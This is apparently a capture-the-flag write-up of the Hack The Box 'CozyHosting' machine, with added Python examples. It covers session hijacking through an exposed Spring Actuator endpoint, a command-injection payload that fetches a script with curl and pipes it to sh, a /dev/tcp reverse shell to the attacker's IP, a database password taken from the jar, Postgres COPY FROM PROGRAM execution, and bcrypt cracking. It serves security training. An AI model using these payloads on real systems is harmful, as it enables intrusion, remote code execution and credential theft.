User
Nmap
┌──(root💀kali)-[~]
└─# nmap -sCV -p- -T4 10.10.11.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-02 23:13 EDT
Nmap scan report for 10.10.11.230
Host is up (0.18s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 663.02 seconds
┌──(root💀kali)-[~]
└─# vim /etc/hosts
┌──(root💀kali)-[~]
└─# tail -n 1 /etc/hosts
10.10.11.230 cozyhosting.htb
Add the hostname to /etc/hosts (the nmap http-title line shows the redirect to http://cozyhosting.htb).
dirsearch
┌──(root💀kali)-[~]
└─# dirsearch -u http://cozyhosting.htb/ -e *
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: 2023AntCTF | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/cozyhosting.htb/-_23-09-03_00-03-38.txt
Error Log: /root/.dirsearch/logs/errors-23-09-03_00-03-38.log
Target: http://cozyhosting.htb/
[00:03:39] Starting:
[00:04:36] 200 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[00:04:54] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:04:59] 400 - 435B - /a%5c.aspx
[00:05:03] 200 - 634B - /actuator
[00:05:03] 200 - 5KB - /actuator/env
[00:05:04] 200 - 491B - /actuator/sessions
[00:05:04] 200 - 10KB - /actuator/mappings
[00:05:04] 200 - 124KB - /actuator/beans
[00:05:05] 200 - 15B - /actuator/health
[00:05:06] 401 - 97B - /admin
[00:06:20] 200 - 0B - /engine/classes/swfupload//swfupload.swf
[00:06:20] 200 - 0B - /engine/classes/swfupload//swfupload_f9.swf
[00:06:21] 500 - 73B - /error
[00:06:23] 200 - 0B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[00:06:24] 200 - 0B - /extjs/resources//charts.swf
[00:06:35] 200 - 0B - /html/js/misc/swfupload//swfupload.swf
[00:06:40] 200 - 12KB - /index
[00:06:54] 200 - 4KB - /login
[00:06:56] 200 - 0B - /login.wdm%2e
[00:06:57] 204 - 0B - /logout
[00:07:49] 400 - 435B - /servlet/%C0%AE%C0%AE%C0%AF
Task Completed
The scan turns up /actuator, so the backend is presumably Spring Boot. Feels like an HVV target. Several Actuator endpoints answer 200 with no authentication at all: /actuator/env (the property sources; values may be masked), /actuator/mappings (every route the application serves, including the admin-only ones), /actuator/beans, and the interesting one here, /actuator/sessions. Side note on the dirsearch run: the unquoted -e * was glob-expanded by the shell to a file in the working directory (the banner says Extensions: 2023AntCTF), so the extension list was not what was intended; quote it or pass an explicit comma-separated list.
The /actuator/sessions endpoint
{"7C923705DC41E61F208F884C9805BC62":"kanderson","AA2A1070790E1763E151787985056C0F":"UNAUTHORIZED","5DE00C9CFCA66C41B19981C5D42C50E3":"UNAUTHORIZED","F0F29E7C3878F0FFE9B04832DDCE7B82":"admin","C5DBD5957CEF28CA7D3C9B6FB720B903":"UNAUTHORIZED","47A5DDA1275C3F7A737169C2351950F1":"UNAUTHORIZED","B1BEAEE50493C63D8CD608EDAE5E8EC6":"UNAUTHORIZED","A71AEF86230669736013CAFEFF8EC720":"UNAUTHORIZED","D57F20FDBD896308C1AF0F1DC5207362":"UNAUTHORIZED","709E6B96390700BFEDDCC946C0358538":"kanderson"}
The format is simple: session ID on the left, principal on the right. Any entry whose value is not UNAUTHORIZED is an authenticated session that can be reused as long as it has not expired.
| username  | session                          |
|-----------|----------------------------------|
| kanderson | 7C923705DC41E61F208F884C9805BC62 |
| admin     | F0F29E7C3878F0FFE9B04832DDCE7B82 |
| kanderson | 709E6B96390700BFEDDCC946C0358538 |
Intercept a request in the proxy, replace the JSESSIONID cookie with one of kanderson's session IDs, and see what happens.
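The session-picking and cookie replay described above, as an added example (this is my code, not the writeup's or the application's). SESSIONS_DUMP is the JSON the endpoint returned, copied verbatim; the helpers assume the application reads the standard JSESSIONID cookie, which the captured request later in the writeup confirms. The base URL and the /admin path are the writeup's; nothing is sent unless fetch_as() is called.

```python
"""Turn a /actuator/sessions dump into reusable sessions and replay one."""
import json
import urllib.error
import urllib.request

# Verbatim copy of the /actuator/sessions response shown in the writeup.
SESSIONS_DUMP = (
    '{"7C923705DC41E61F208F884C9805BC62":"kanderson",'
    '"AA2A1070790E1763E151787985056C0F":"UNAUTHORIZED",'
    '"5DE00C9CFCA66C41B19981C5D42C50E3":"UNAUTHORIZED",'
    '"F0F29E7C3878F0FFE9B04832DDCE7B82":"admin",'
    '"C5DBD5957CEF28CA7D3C9B6FB720B903":"UNAUTHORIZED",'
    '"47A5DDA1275C3F7A737169C2351950F1":"UNAUTHORIZED",'
    '"B1BEAEE50493C63D8CD608EDAE5E8EC6":"UNAUTHORIZED",'
    '"A71AEF86230669736013CAFEFF8EC720":"UNAUTHORIZED",'
    '"D57F20FDBD896308C1AF0F1DC5207362":"UNAUTHORIZED",'
    '"709E6B96390700BFEDDCC946C0358538":"kanderson"}'
)


def live_sessions(dump: str) -> dict:
    """Map principal -> [session ids], dropping anonymous (UNAUTHORIZED) entries."""
    by_user = {}
    for session_id, principal in json.loads(dump).items():
        if principal == "UNAUTHORIZED":
            continue
        by_user.setdefault(principal, []).append(session_id)
    return by_user


def pick_session(dump: str, user: str) -> str:
    """First live session id for `user`; LookupError if they have none."""
    ids = live_sessions(dump).get(user)
    if not ids:
        raise LookupError(f"no live session for {user}")
    return ids[0]


def build_request(base_url: str, session_id: str, path: str = "/admin") -> urllib.request.Request:
    """GET `path` presenting someone else's JSESSIONID (assumed cookie name). Not sent here."""
    req = urllib.request.Request(base_url.rstrip("/") + path)
    req.add_header("Cookie", f"JSESSIONID={session_id}")
    return req


def fetch_as(base_url: str, session_id: str, path: str = "/admin", timeout: int = 10):
    """Replay the cookie and return (status, body). /admin answered 401 to the
    anonymous dirsearch hit above, so a 200 here proves the hijack worked."""
    try:
        with urllib.request.urlopen(build_request(base_url, session_id, path), timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


if __name__ == "__main__":
    for user, ids in live_sessions(SESSIONS_DUMP).items():
        print(f"{user}: {', '.join(ids)}")
    req = build_request("http://cozyhosting.htb", pick_session(SESSIONS_DUMP, "kanderson"))
    print(req.full_url, req.get_header("Cookie"))
```

Sessions on this box expire after five minutes (server.servlet.session.timeout=5m in the application.properties recovered later), so pull the dump again right before replaying. Defensively, a sessions endpoint has no business in management.endpoints.web.exposure.include on a network-facing port; health is normally the only one worth exposing, and even that behind authentication.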
RCE
The request was received successfully.
Request succeeded.
Reverse shell
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# cat 1@1
bash -c "bash -i>& /dev/tcp/10.10.16.8/5555 0>&1"
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.230 - - [03/Sep/2023 01:15:32] "GET /1 HTTP/1.1" 200 -
10.10.11.230 - - [03/Sep/2023 01:15:44] code 404, message File not found
10.10.11.230 - - [03/Sep/2023 01:15:44] "GET /1@a HTTP/1.1" 404 -
10.10.11.230 - - [03/Sep/2023 01:17:21] "GET /1 HTTP/1.1" 200 -
10.10.11.230 - - [03/Sep/2023 01:17:44] "GET /1 HTTP/1.1" 200 -
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 59
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cozyhosting.htb/admin?error=Invalid%20hostname!
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AFECAAC1BC4B3E43937EAA0E5CE83F9C
Connection: close
host=1&username=kanderson||curl$IFS$9http://10.10.16.8/1|sh
HTTP/1.1 302
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 03 Sep 2023 05:17:21 GMT
Content-Length: 0
Location: http://cozyhosting.htb/admin?error=ssh: Could not resolve hostname kanderson: Temporary failure in name resolution/bin/bash: line 1: sh@1: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0100 50 100 50 0 0 151 0 --:--:-- --:--:-- --:--:-- 151curl: (23) Failed writing body
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Sent like that, the response comes back with sh@1: command not found. The application builds username@host as one string and executes it, so the host value 1 gets glued onto the end of whatever the username ends with, here sh. Two things worth noting in passing: $IFS$9 stands in for a space ($IFS expands to the shell's whitespace characters and the empty positional parameter $9 only ends the variable name before http), and the Location header reflects the command's stderr into the error parameter, which is the feedback channel that lets us see all this. So how do we stop the trailing @host from touching the command we want to run, curl$IFS$9http://10.10.16.8/1|sh?
The answer is to append %0a. The newline ends the command line, so @1 lands on a line of its own and fails harmlessly after our pipeline has already run.
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cozyhosting.htb/admin?error=Invalid%20hostname!
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AFECAAC1BC4B3E43937EAA0E5CE83F9C
Connection: close
host=1&username=kanderson||curl$IFS$9http://10.10.16.8/1|sh%0a
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# nc -lvnp 5555
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
ls
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:46926.
bash: cannot set terminal process group (1061): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$
Reverse shell obtained.
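A model of the /executessh bug next to a hardened version, as an added example (my code, not the CozyHosting application's source, which is not on this page). The vulnerable function reproduces what the captured responses show: the app concatenates username@host into one ssh command line and runs it through bash (the /bin/bash: line 1: sh@1: command not found text came back in the Location header). The exact ssh options are an assumption; the two payloads are the writeup's own, URL-decoded.

```python
"""Vulnerable command construction vs. an allow-listed argv version."""
import re

# The writeup's payloads, URL-decoded. %0a becomes a real newline.
PAYLOAD_NO_NEWLINE = "kanderson||curl$IFS$9http://10.10.16.8/1|sh"
PAYLOAD_NEWLINE = PAYLOAD_NO_NEWLINE + "\n"


def vulnerable_command(username: str, host: str) -> str:
    """What the app hands to `bash -c`: raw string concatenation.
    (ssh options are assumed; the concatenation is what the responses prove.)"""
    return f"ssh -o ConnectTimeout=1 {username}@{host}"


def last_line(cmd: str) -> str:
    """bash -c runs the string line by line; this shows where '@host' lands."""
    return cmd.splitlines()[-1]


def expand_ifs(word: str) -> list:
    """Rough picture of what bash does with $IFS$9: $IFS expands to whitespace,
    word splitting removes it, and the empty $9 only terminates the variable
    name so that 'http' is not read as part of it."""
    return [w for w in word.replace("$IFS$9", " ").split(" ") if w]


# Hardened side. fullmatch, not match: with re.match a trailing '$' would
# still accept "kanderson\n", which is exactly the %0a trick above.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")          # POSIX-style login names
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")       # no leading '-', so never an ssh option


def hardened_argv(username: str, host: str) -> list:
    """Allow-list both fields and build an argv list that no shell ever parses.
    Run it with subprocess.run(argv) (shell=False, the default)."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid host")
    return ["ssh", "-o", "ConnectTimeout=1", f"{username}@{host}"]


if __name__ == "__main__":
    print(last_line(vulnerable_command(PAYLOAD_NO_NEWLINE, "1")))   # ends in |sh@1
    print(last_line(vulnerable_command(PAYLOAD_NEWLINE, "1")))      # just @1
    print(hardened_argv("kanderson", "1"))
```

The fix is not escaping but never involving a shell: with an argv list the username is one argument whatever characters it contains, and the allow-list on top keeps it from being turned into an ssh option.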
Download the jar
Use nc to pull the jar back to the attack box and take a look at it.
cp cloudhosting-0.0.1.jar cloudhosting-0.0.1.zip
unzip cloudhosting-0.0.1.zip
mkdir cloud
mv BOOT-INF org META-INF cloud
cd cloud
ls
grep "pass" ./ -r
grep "password" ./ -r
grep "username" ./ -r
Rename the jar to .zip (a jar is just a zip archive, so unzip opens it either way) and grep the extracted tree for sensitive strings.
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# grep "password" ./ -r
grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar: binary file matches
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class: binary file matches
./BOOT-INF/classes/templates/login.html: <input type="password" name="password" class="form-control" id="yourPassword"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your password!</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot: binary file matches
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf: binary file matches
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# grep "username" ./ -r
./BOOT-INF/classes/application.properties:spring.datasource.username=postgres
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class: binary file matches
./BOOT-INF/classes/templates/admin.html: <input name="username" class="form-control" id="username" placeholder="user">
./BOOT-INF/classes/templates/admin.html: <label for="username">Username</label>
./BOOT-INF/classes/templates/login.html: <input type="text" name="username" class="form-control" id="yourUsername"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your username.</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# cat ./BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
Postgres database
| spring.datasource.username | spring.datasource.password |
|----------------------------|----------------------------|
| postgres                   | Vg&nvzAQ7XxR               |
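The same credential hunt done programmatically, as an added example (my code, not from the writeup). A Spring Boot fat jar is a zip: the application's own config lives under BOOT-INF/classes/ and third-party jars under BOOT-INF/lib/, which is why the grep above matched font files and a spring-security jar as well. make_sample_jar() builds an in-memory jar, constructed for this example, that carries the application.properties shown above so the scan runs offline; point find_secrets() at the real cloudhosting-0.0.1.jar bytes to use it for real.

```python
"""Scan a Spring Boot jar for credential-looking keys without unzipping by hand."""
import io
import re
import zipfile

# The application.properties recovered above (datasource lines verbatim).
APPLICATION_PROPERTIES = """server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
"""

CONFIG_SUFFIXES = (".properties", ".yml", ".yaml", ".env", ".xml", ".json")
SECRET_KEY_RE = re.compile(r"pass(word|wd)?|secret|token|credential|private[._-]?key", re.I)
# key = value / key: value; comments (#, !) and lines without a separator are skipped.
KV_RE = re.compile(r"^\s*([^#!=:\s][^=:\s]*)\s*[=:]\s*(.*?)\s*$")


def make_sample_jar() -> bytes:
    """Constructed stand-in for cloudhosting-0.0.1.jar with the usual layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("BOOT-INF/classes/application.properties", APPLICATION_PROPERTIES)
        jar.writestr("BOOT-INF/classes/templates/login.html",
                     '<input type="password" name="password" class="form-control">')
        jar.writestr("BOOT-INF/lib/some-dependency-1.0.jar", b"")  # nested jars are skipped
    return buf.getvalue()


def parse_kv(text: str) -> dict:
    """Flat key/value parse; good for .properties and simple top-level YAML.
    Nested YAML loses its context here, which is acceptable for a first pass."""
    props = {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            props[m.group(1)] = m.group(2)
    return props


def find_secrets(jar_bytes: bytes) -> dict:
    """{member path: {key: value}} for keys that look like secrets, app config only."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if not name.endswith(CONFIG_SUFFIXES) or name.startswith("BOOT-INF/lib/"):
                continue
            text = jar.read(name).decode("utf-8", errors="replace")
            hits = {k: v for k, v in parse_kv(text).items() if SECRET_KEY_RE.search(k)}
            if hits:
                found[name] = hits
    return found


def datasource(jar_bytes: bytes) -> dict:
    """The JDBC triple, ready for the psql connection in the next step."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        props = parse_kv(jar.read("BOOT-INF/classes/application.properties").decode())
    return {k: props.get(f"spring.datasource.{k}") for k in ("url", "username", "password")}


if __name__ == "__main__":
    sample = make_sample_jar()
    print(find_secrets(sample))
    print(datasource(sample))
```

Strings inside .class files (the FakeUser.class hit above) are not covered by this; those need a decompiler or at least strings over BOOT-INF/classes.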
app@cozyhosting:/app$ netstat -ntlp
netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1061/java
Set up an frp proxy and look inside
Internally 127.0.0.1:8080 is just a web service (at first I took it for something started by another user; see below).
Now that we have the Postgres password, connect and look around.
Navicat could not connect for some reason even though the proxy was fine (it turned out the Navicat version was too old).
So use the command line from the shell instead.
Connecting from the command line
Because this shell has no pty, psql's pager throws the "terminal is not fully functional" prompts seen below; \pset pager off (or PAGER=cat in the environment) avoids that.
app@cozyhosting:/tmp$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
cozyhosting=#
cozyhosting=# help
help
You are using psql, the command-line interface to PostgreSQL.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit
cozyhosting=# \l
                                 List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)
cozyhosting=#
cozyhosting=# \c cozyhosting
\c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \conninfo
\conninfo
You are connected to database "cozyhosting" as user "postgres" on host "localhost" (address "127.0.0.1") at port "5432".
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
cozyhosting=# \dt
         List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)
cozyhosting=# select * from users;
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
cozyhosting=# select * from hosts;
 id | username  |      hostname
----+-----------+--------------------
  1 | kanderson | suspicious mcnulty
  5 | kanderson | boring mahavira
  6 | kanderson | stoic varahamihira
  7 | kanderson | awesome lalande
(4 rows)
Command execution through Postgres
Postgres can run OS commands: COPY ... FROM PROGRAM executes a program on the database server as the postgres OS user. It needs a superuser (or the pg_execute_server_program role), which spring.datasource.username=postgres gives us.
Refer:https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
cozyhosting=# copy (SELECT '') to program 'id'
cozyhosting-# DROP TABLE IF EXISTS cmd_exec;
ERROR: syntax error at or near "DROP"
LINE 2: DROP TABLE IF EXISTS cmd_exec;
        ^
The first statement was entered without a terminating semicolon, so psql (note the continuation prompt cozyhosting-#) treated the pasted DROP TABLE as part of the same statement and rejected it. Enter the statements one at a time, each ending in a semicolon:
cozyhosting=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
cozyhosting=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
cozyhosting=# SELECT * FROM cmd_exec;
                               cmd_output
------------------------------------------------------------------------
 uid=114(postgres) gid=120(postgres) groups=120(postgres),119(ssl-cert)
(1 row)
The command runs as the postgres OS user (uid 114), not as app, so this is a lateral move rather than an escalation.
Pop another reverse shell, this time as the postgres user
Postgres reverse shell
Looked around as postgres; nothing useful there.
frp proxy
There is also a service on port 8080 internally.
It is just nginx forwarding external port 80 to the internal 8080: application.properties sets server.address=127.0.0.1, so the Spring application listens on loopback only, and 1061/java in the netstat output is the very process our shell came from (bash complained about process group 1061 when the shell connected). Same service, nothing new.
Change of direction: cracking the hash
After looking around, the only thing still unknown is the admin password in the database, so it has to be cracked.
kanderson's password was already recovered from the jar: decompile the code with IDEA and it is right there (FakeUser.class, which matched both the password and username greps above, is the place to start).
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
I did not recognise the hash type at first; john identified it as **bcrypt [Blowfish 32/64 X3]**. The $2a$10$ prefix says the same: $2a$ is bcrypt and 10 is the cost factor, 2^10 = 1024 rounds, which is the "Cost 1 (iteration count) is 1024" john prints below.
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# john hash2 /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt
Warning: only loading hashes of type "bcrypt", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "pix-md5"
Use the "--format=pix-md5" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
0g 0:00:00:04 0.43% 2/3 (ETA: 05:44:07) 0g/s 169.8p/s 169.8c/s 169.8C/s yellow..butter
0g 0:00:00:06 0.61% 2/3 (ETA: 05:45:04) 0g/s 173.0p/s 173.0c/s 173.0C/s stinky..88888888
0g 0:00:00:08 0.78% 2/3 (ETA: 05:45:35) 0g/s 173.4p/s 173.4c/s 173.4C/s grumpy..jimbob
0g 0:00:00:12 1.15% 2/3 (ETA: 05:45:59) 0g/s 174.0p/s 174.0c/s 174.0C/s 333333..iverson
0g 0:00:00:17 1.56% 2/3 (ETA: 05:46:43) 0g/s 174.1p/s 174.1c/s 174.1C/s jump..otter
Proceeding with incremental:ASCII
0g 0:00:18:55 3/3 0g/s 162.4p/s 162.4c/s 162.4C/s bonnn..boshu
0g 0:00:21:50 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 140912..143622
0g 0:00:21:51 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 142293..150311
0g 0:00:21:52 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 151721..153365
Session aborted
After more than an hour john still had nothing, so switch to hashcat. In hindsight the john run was wrong, not slow: the wordlist was passed as a bare argument instead of --wordlist=, so john read rockyou-75.txt as a second hash file (hence the "also saw type tripcode/descrypt/pix-md5" warnings) and fell through its default sequence of single mode, /usr/share/john/password.lst and incremental mode, never touching rockyou at all. The correct invocation is john --format=bcrypt --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt hash2.
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# hashcat -m 3200 -a 0 hash2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10300H CPU @ 2.50GHz, 2918/5900 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
